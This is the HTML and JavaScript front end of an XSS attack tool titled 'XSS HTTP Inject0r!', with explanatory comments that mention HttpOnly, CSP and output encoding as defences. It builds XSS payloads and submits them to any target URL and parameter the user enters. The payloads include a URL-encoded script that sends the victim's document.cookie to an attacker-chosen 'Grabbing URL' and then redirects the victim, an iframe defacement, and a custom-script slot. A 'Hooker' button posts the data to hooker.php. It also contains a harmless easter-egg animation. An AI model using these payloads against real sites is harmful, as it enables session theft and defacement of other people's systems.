index.html 12 KB

  1. <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en">
  2. <head><title>XSS HTTP Inject0r!</title>
  3. <meta http-equiv="content-type" content="text/html;charset=utf-8">
  4. <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
  5. <style type="text/css">
  6. <!--
  7. body,td,th {
  8. color: #FFFFFF;
  9. }
  10. body {
  11. background-color: #000000;
  12. }
  13. a {
  14. color:lime;
  15. }
  16. -->
  17. </style>
  18. <script type="text/javascript">
  // Canned test strings. SetScenario() and SetHook() append one of them to the
  // user-supplied "Vector" prefix and send the result as the value of the
  // parameter under test. A page that HTML-encodes that parameter on output
  // renders each of them as inert text.

  // "JS Alert": an event-handler attribute, so no script element is involved.
  var alertbox = "<BODY ONLOAD=alert('1')>";

  // "HTML Marquee": plain markup, no script at all.
  var marquee = "<marquee>0wned!</marquee>";

  // "Cookie Popup": shows document.cookie in a dialog; cookies flagged HttpOnly
  // are not exposed through document.cookie. The slash of the closing tag is
  // backslash-escaped so the HTML parser does not take it for the end of the
  // surrounding script element.
  var cookie = "<ScRIPt>alert(document.cookie);<\/ScRiPt>";

  // "Defacement": frames a local image at a fixed size.
  var iframe = "<iFrAmE src='../images/pwned.jpg' scrolling=no frameborder=0 width='812' height='576'><\/iFrAmE>";

  // Initial UI state: both optional input rows hidden, GET hint shown,
  // POST hint hidden.
  window.onload = function () {
    var initialDisplay = [
      ['use_custom', 'none'],
      ['cookie_grab_script_div', 'none'],
      ['get_poc', 'block'],
      ['post_poc', 'none']
    ];
    for (var k = 0; k < initialDisplay.length; k++) {
      document.getElementById(initialDisplay[k][0]).style.display = initialDisplay[k][1];
    }
  };
  /**
   * Keep the form in step with the selected HTTP-method radio button: show the
   * matching proof-of-concept hint and set the method the `poc` form submits
   * with.
   *
   * @param {HTMLFormElement} [frm] - unused; the GET radio calls this without it.
   */
  function SetMethod(frm) {
    var useGet = document.getElementById('get').checked;

    document.getElementById('post_poc').style.display = useGet ? 'none' : 'block';
    document.getElementById('get_poc').style.display = useGet ? 'block' : 'none';
    document.poc.method = useGet ? "GET" : "POST";
  }
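  /**
   * Build the request for the selected test case and submit the `poc` form
   * directly to the target URL.
   *
   * The hidden `lulz` input is renamed to the parameter under test and filled
   * with prefix + test string, so the browser sends it as an ordinary GET/POST
   * field (the method is whatever SetMethod() last set). Whether anything
   * executes depends entirely on how the target echoes that parameter: output
   * encoding for the HTML context neutralises every case here.
   *
   * @param {HTMLFormElement} frm - the `poc` form (the button passes `this.form`).
   * @returns {boolean|undefined} false when the target or the parameter name is
   *   empty; otherwise undefined, after the form has been submitted.
   */
  function SetScenario(frm) {
    // Declared locally. The original assigned these without `var`, which
    // created globals; `cookie_grab_script` is also the id of an input on the page.
    var prefix = frm.prefix.value;
    var customValue = frm.custom_injection.value;
    var grabUrl = frm.cookie_grab_script.value;

    if (frm.target.value === "") {
      alert("Hey! Where is your target?");
      return false;
    }
    if (frm.vulnerability.value === "") {
      alert("You should enter a vulnerable parameter");
      return false;
    }

    var field = document.getElementById('lulz');
    document.poc.action = frm.target.value;
    field.name = frm.vulnerability.value;

    // "Cookie Grabbing": script that reports document.cookie to the "Grabbing
    // URL" through an image request and then navigates to google.com. Cookies
    // flagged HttpOnly never reach document.cookie, and a Content-Security-Policy
    // that disallows inline script stops this case from running at all.
    var grabPayload = unescape("%3CScRiPt%3Edocument.write%28%22%3Cimg%20src=%27") + grabUrl + unescape("?%22%2bescape%28document.cookie%29%2b%22%27%3E%22%29") + ";document.location='http://google.com';" + unescape("%3c%2FScRiPt%3E");

    // Same order as the original if-sequence; a later checked entry overrides
    // an earlier one (the radios share one group, so normally one is checked).
    var cases = [
      ['alertbox', alertbox],
      ['marquee', marquee],
      ['cookie', cookie],
      ['iframe', iframe],
      ['custom', customValue],
      ['cookie_grab', grabPayload]
    ];
    for (var k = 0; k < cases.length; k++) {
      if (document.getElementById(cases[k][0]).checked) {
        field.value = prefix + cases[k][1];
      }
    }

    document.poc.submit();
  }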
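  /**
   * Assemble prefix + test string for the selected case and post the whole
   * form to hooker.php instead of to the target.
   *
   * The assembled string travels in the hidden `injection` field; the other
   * named inputs of the form (target, vulnerability, prefix, ...) are submitted
   * with it. What hooker.php does with them is not visible from this page.
   *
   * @param {HTMLFormElement} frm - the `poc` form (the button passes `this.form`).
   * @returns {boolean|undefined} false when the target or the parameter name is
   *   empty, or when no case is selected; otherwise undefined after submitting.
   */
  function SetHook(frm) {
    // Declared locally; the original leaked all of these as implicit globals.
    var target = frm.target.value;
    var vulnerability = frm.vulnerability.value;
    var prefix = frm.prefix.value;
    var customValue = frm.custom_injection.value;
    var grabUrl = frm.cookie_grab_script.value;

    if (target === "") {
      alert("Hey! Where is your target?");
      return false;
    }
    if (vulnerability === "") {
      alert("You should enter a vulnerable parameter");
      return false;
    }

    // "Cookie Grabbing": script that reports document.cookie to the "Grabbing
    // URL" through an image request and then navigates to google.com. HttpOnly
    // cookies are not readable this way.
    var grabPayload = unescape("%3CScRiPt%3Edocument.write%28%22%3Cimg%20src=%27") + grabUrl + unescape("?%22%2bescape%28document.cookie%29%2b%22%27%3E%22%29") + ";document.location='http://google.com';" + unescape("%3C%2FScRiPt%3E");

    // Same order as the original if-sequence; a later checked entry wins.
    var cases = [
      ['alertbox', alertbox],
      ['marquee', marquee],
      ['cookie', cookie],
      ['cookie_grab', grabPayload],
      ['iframe', iframe],
      ['custom', customValue]
    ];
    var injection;
    for (var k = 0; k < cases.length; k++) {
      if (document.getElementById(cases[k][0]).checked) {
        injection = prefix + cases[k][1];
      }
    }

    // With no case selected the original read an unassigned variable here;
    // stop instead of posting a meaningless value.
    if (typeof injection === "undefined") {
      return false;
    }

    document.getElementById('injection').value = injection;
    document.poc.action = "hooker.php";
    document.poc.submit();
  }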
  /**
   * Show the extra input row that belongs to the selected case: the custom
   * injection box for "Custom Script", the grabbing-URL box for "Cookie
   * Grabbing", and neither for the other cases. The `line1` rule is visible
   * only together with one of the two rows.
   *
   * @param {HTMLFormElement} [frm] - unused; the radios call this without it.
   */
  function SetScript(frm) {
    var customRow = document.getElementById('use_custom');
    var grabRow = document.getElementById('cookie_grab_script_div');
    var rule = document.getElementById('line1');

    // Start from "everything hidden", then reveal at most one row.
    customRow.style.display = 'none';
    grabRow.style.display = 'none';
    rule.style.display = 'none';

    var row = null;
    if (document.getElementById('custom').checked) {
      row = customRow;
    } else if (document.getElementById('cookie_grab').checked) {
      row = grabRow;
    }

    if (row !== null) {
      row.style.display = 'block';
      rule.style.display = 'block';
    }
  }
  /**
   * Prefill the form with a bundled proof-of-concept.
   *
   * Only the radio button is checked here; the form's method attribute is left
   * as SetMethod() last set it.
   *
   * @param {string} m - "GET" selects the GET radio, anything else the POST radio.
   * @param {string} target - value for the "Target" field.
   * @param {string} vuln - value for the "Vulnerability" (parameter name) field.
   * @param {string} prefix - percent-encoded "Vector" prefix; decoded with unescape().
   * @param {string} cook_grab_scr - value for the "Grabbing URL" field.
   */
  function LoadPoc(m, target, vuln, prefix, cook_grab_scr) {
    var radioId = (m == "GET") ? "get" : "post";
    document.getElementById(radioId).checked = true;

    var fieldValues = [
      ["target", target],
      ["vulnerability", vuln],
      ["prefix", unescape(prefix)],
      ["cookie_grab_script", cook_grab_scr]
    ];
    for (var k = 0; k < fieldValues.length; k++) {
      document.getElementById(fieldValues[k][0]).value = fieldValues[k][1];
    }
  }
  // State shared by successive Egg() ticks.
  var cans = [];      // one drawing canvas per tick, indexed by frame number
  var frame = 0;      // tick counter, incremented at the end of Egg()

  // Per-page-load random factors applied to the second circle of each pair
  // and to the horizontal step between canvases.
  var vStickLength = 0.6 * (-5 + 18 * Math.random());
  var vStickWidth = 0.5 + 5 * Math.random();
  var vIncX = Math.random() * 80 + 20;

  var blocks = [];    // text banners appended during the first 60 ticks
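  /**
   * Easter-egg animation behind the "little rabbit" link. Each call scrolls the
   * page, builds a small text banner, adds a fixed-position canvas with random
   * translucent circles, and schedules the next call 200 ms later.
   *
   * Changes from the original: the timer is given the function itself rather
   * than a string to evaluate (so it also runs under a Content-Security-Policy
   * without 'unsafe-eval'), loop and scratch variables are local instead of
   * implicit globals, random channels are floored with Math.floor (parseInt on
   * a number misreads values printed in exponent form), and the sweep over
   * `cans` stops at length - 1.
   *
   * Note: one 360x598 canvas is appended on every tick and never removed, so
   * the document keeps growing for as long as the animation runs.
   */
  function Egg() {
    // Integer in [base, base + span).
    function rnd(base, span) {
      return Math.floor(base + Math.random() * span);
    }
    // CSS rgba() string from three random channels in [0, 255) and a fixed alpha.
    function randomRgba(alpha) {
      return 'rgba(' + rnd(0, 255) + ',' + rnd(0, 255) + ',' + rnd(0, 255) + ',' + alpha + ')';
    }

    window.scrollBy(0, 100);

    // --- text banner -------------------------------------------------------
    var banner = document.createElement('canvas');
    banner.id = "CursorLayer";
    banner.width = 250;
    banner.height = 46;
    banner.style.zIndex = -2;
    banner.style.position = "relative";
    banner.style.padding = 5;
    banner.style.top = 0;
    banner.style.border = "1px solid";
    var text = banner.getContext('2d');
    if (frame < 55) {
      banner.style.background = 'rgba(' + rnd(30, 8) + ',' + rnd(30, 8) + ',' + rnd(100, 155) + ',1)';
      text.font = 'italic 20pt Calibri';
      text.fillStyle = 'rgba(' + rnd(0, 25) + ',' + rnd(0, 25) + ',' + rnd(0, 25) + ',1)';
      text.fillText('BigBrother!!!', 20, 30);
    } else {
      banner.style.background = 'lime';
      text.font = 'italic 20pt Courier';
      text.fillStyle = 'black';
      var luck = ["Remember", "Use", "Squat", "Think", "Mayh3m!", "Hell!", "Destroy", "Fight", "Big Brother!", "Shit", "The", "Crypto", "Anarchy", "Truth", "Out", "Ilegal", "Hack", "CCTV", "XSS", "Satellite", "SlaveMaster", "Money", "Bitcoin", "Will be"];
      text.fillText(luck[Math.floor(luck.length * Math.random())], 20, 30);
    }

    // Banners are attached for the first 60 ticks only; from then on each tick
    // hides the banner created 60 ticks earlier, if there is one.
    if (frame < 60) {
      blocks.push(document.body.appendChild(banner));
    } else if (typeof blocks[frame - 60] != "undefined") {
      blocks[frame - 60].style.display = "none";
    }

    // --- circle layer ------------------------------------------------------
    var layer = document.createElement('canvas');
    layer.style.zIndex = -666;
    layer.width = 360;
    layer.height = 598;
    layer.style.position = "fixed";
    layer.style.left = ((frame * vIncX) % 1024) + "px";
    layer.style.top = "10px";
    cans[frame] = layer;
    document.body.appendChild(layer);

    var ctx = layer.getContext('2d');
    // The original called Math.random(50); Math.random takes no arguments.
    ctx.moveTo(-15 + Math.random(), 20);
    for (var i = 0; i < 5; i++) {
      ctx.strokeStyle = randomRgba(0.1);
      ctx.lineWidth = 3;
      ctx.strokeStyle = randomRgba(0.4);
      ctx.beginPath();
      var cx = 60 + 100 * Math.random();
      var cy = 50 + 400 * Math.random();
      ctx.arc(cx, cy, i * 8.5, 0, 2 * Math.PI, false);
      ctx.fill();
      ctx.strokeStyle = randomRgba(0.1);
      ctx.fillStyle = randomRgba(0.1);
      ctx.arc(cx * vStickWidth, cy * vStickLength, i * 2.5, 0, 2 * Math.PI, false);
      ctx.fill();
      ctx.lineWidth = i / 6;
      ctx.strokeStyle = '#aa3300';
      // Every fifth tick, give every existing layer a new random stroke colour.
      if (frame % 5 === 0) {
        for (var j = 0; j < cans.length; j++) {
          if (typeof cans[j] === 'undefined') continue;
          cans[j].getContext("2d").strokeStyle = randomRgba(1);
        }
      }
    }

    setTimeout(Egg, 200);
    frame++;
  }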
  207. </script>
  208. </head><body>
  209. <center>
  210. <table>
  211. <tr valign="middle">
  212. <td align="center">
  213. <br /><h2><a href="https://github.com/epsylon/xss-http-injector" target="_blank">XSS HTTP Inject0r!</a></h2> - 2014 - <a href="http://gplv3.fsf.org" target="_blank">GPLv3</a><br /><font size=-1><a style="text-decoration:none;" href=# onClick=javascript:Egg()>"little rabbit"</a> version</font>
  214. </td>
  215. <td>
  216. <img hspace="10" src="images/pwned.jpg" width="350" height="203" border="1"><br />
  217. </td>
  218. </tr>
  219. </table>
  220. <hr>
  221. <form name="poc">
  222. <table>
  223. <tr>
  224. <td><u>Method</u> (HTTP method):</td><td><table><tr><td><input type="radio" name="method" id="get" onclick="javascript:SetMethod();" checked value="GET">GET</td><td><input type="radio" name="method" id="post" onclick="javascript:SetMethod(this.form);" value="POST">POST</td></tr></table></td>
  225. </tr>
  226. <tr>
  227. <td colspan=2>
  228. <hr><script>var l=""+document.location;l=l.replace(/(.*)\/.*/,"$1/home.php")</script>
  229. <label id="get_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <i>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/get.html" target="_blank">SandBoX (HTTP-GET)</a> | <a onClick="javascript:LoadPoc('GET','sandbox/search.php','search_text','%22>',l)" href=#>Load PoC</a></label>
  230. <label id="post_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <i>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/post.html" target="_blank">SandBoX (HTTP-POST)</a> | <a onClick="javascript:LoadPoc('POST','sandbox/search.php','search_text','%22>',l)" href=#>Load PoC</a></label>
  231. <hr>
  232. </td>
  233. </tr>
  234. <tr>
  235. <td><u>Target</u> (Url to target's form):</td><td><input type="text" name="target" size="35" id="target"> (<i>ex: http://vulnsite.com/contact.php</i>)</td>
  236. </tr>
  237. <tr>
  238. <td><u>Vulnerability</u> (Vulnerable parameter):</td><td><input type="text" name="vulnerability" id="vulnerability"> (<i>ex: contact_email</i>)</td>
  239. </tr>
  240. <tr>
  241. <td><u>Vector</u> (Code prefix to inject):</td><td><input type="text" name="prefix" size="35" id="prefix"> (<i>ex: "></i>)</td>
  242. </tr>
  243. </table>
  244. <hr>
  245. <table border="1" cellpadding="6" cellspacing="6">
  246. <tr>
  247. <td>JS Alert</td><td> <input type="radio" name="exploit" id="alertbox" onclick="javascript:SetScript();" checked></td>
  248. <td>Cookie Popup</td><td> <input type="radio" name="exploit" id="cookie" onclick="javascript:SetScript();" /></td>
  249. <td>HTML Marquee</td><td> <input type="radio" name="exploit" id="marquee" onclick="javascript:SetScript();" /></td>
  250. <td>Cookie Grabbing</td><td> <input type="radio" name="exploit" id="cookie_grab" onclick="javascript:SetScript();" /></td>
  251. <td>Defacement</td><td> <input type="radio" name="exploit" id="iframe" onclick="javascript:SetScript();" /></td>
  252. <td>Custom Script</td><td> <input type="radio" name="exploit" id="custom" onclick="javascript:SetScript();" /></td>
  253. </tr>
  254. </table>
  255. <hr id="line1" style="display:none">
  256. <div id="use_custom" style="display:none">
  257. Custom injection: <input type="text" name="custom_injection" size="92">
  258. </div>
  259. <div id="cookie_grab_script_div" style="display:none">
  260. Grabbing URL: <input type="text" id="cookie_grab_script" name="cookie_grab_script" size="92">
  261. </div>
  262. <hr>
  263. <input type="hidden" id="lulz"></input>
  264. <input type="hidden" name="injection" id="injection"></input>
  265. <table cellpadding="6" cellspacing="6" border="0">
  266. <tr>
  267. <td><input type="submit" value="Inject!" onClick="return SetScenario(this.form)" style="padding: 10px; font-weight:bold;"></td>
  268. <td><input type="submit" value="Hooker" onClick="return SetHook(this.form)" style="padding: 10px; font-weight:bold;"></td>
  269. </tr>
  270. </table>
  271. </form>
  272. </body>
  273. </html>